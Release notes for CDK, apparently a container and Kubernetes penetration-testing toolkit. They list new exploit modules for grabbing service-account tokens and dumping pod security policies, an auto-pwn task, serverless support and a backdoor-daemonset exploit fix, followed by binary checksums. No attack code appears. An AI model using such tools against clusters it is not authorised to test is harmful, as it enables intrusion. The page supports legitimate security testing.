    • Enable auto-pwn task.
    • New exploit: k8s-get-sa-token
    • New exploit: k8s-psp-dump
    • Release the thin version, now CDK can be easily used to pwn serverless/function service.
    • Use Github actions to compile and release.

    Fixes

    • HTTP header set twice in several exploits.
    • Wrong parameter output in k8s-backdoor-daemonset exploit.

    Release Date: 2021-04-11

    |sha256|executable file|
    |---|---|
    |802cc16a8b00b49fbc1685cdfa652fabe7b53d5d0e1fe1a1da4ab0da59ec263f|cdk_darwin_amd64|
    |b074de2206cbff42293870201e0faf2113986a64fba6cc4682e2a87f518ee7d4|cdk_linux_386|
    |6e24ebb4b88122fe10261cb8cf32f92c812690c49aea29f2d708557ea5feb186|cdk_linux_386_thin|
    |350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5|cdk_linux_386_thin_upx|
    |dbeab309b7ecd219233a56c43b0c95f88a39c7d1d524d5f71d319a5928a2b5ad|cdk_linux_386_upx|
    |e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812|cdk_linux_amd64|
    |0857d4485dee17166c1754eb699e8e8e720bff825717e5a23531cd4b8a3c30c1|cdk_linux_amd64_thin|
    |752c9bc83cd57649bece5f5885d921fa0dfd8cb62df66b6db1df281e51cdb560|cdk_linux_amd64_thin_upx|
    |28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd|cdk_linux_amd64_upx|
    |cbfe1884821d8aa5cb10a0eec8719f8273b5a65f2ae826c7079006fff71f14e7|cdk_linux_arm|
    |42e2d4b8d628e3df77baf23238076afb7003f1d31fb08032324f249d80df8302|cdk_linux_arm64|
    |58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d|cdk_linux_arm64_thin|

    Source code(tar.gz)
    Source code(zip)
    cdk_darwin_amd64(11.91 MB)
    cdk_linux_386(9.71 MB)
    cdk_linux_386_thin(4.64 MB)
    cdk_linux_386_thin_upx(1.97 MB)
    cdk_linux_386_upx(3.64 MB)
    cdk_linux_amd64(11.16 MB)
    cdk_linux_amd64_thin(5.48 MB)
    cdk_linux_amd64_thin_upx(2.13 MB)
    cdk_linux_amd64_upx(4.10 MB)
    cdk_linux_arm(9.68 MB)
    cdk_linux_arm64(10.43 MB)
    cdk_linux_arm64_thin(5.12 MB)
  • v0.1.10(Feb 8, 2021)

  • v0.1.9(Jan 29, 2021)

  • v0.1.8(Jan 15, 2021)

  • v0.1.7(Dec 30, 2020)
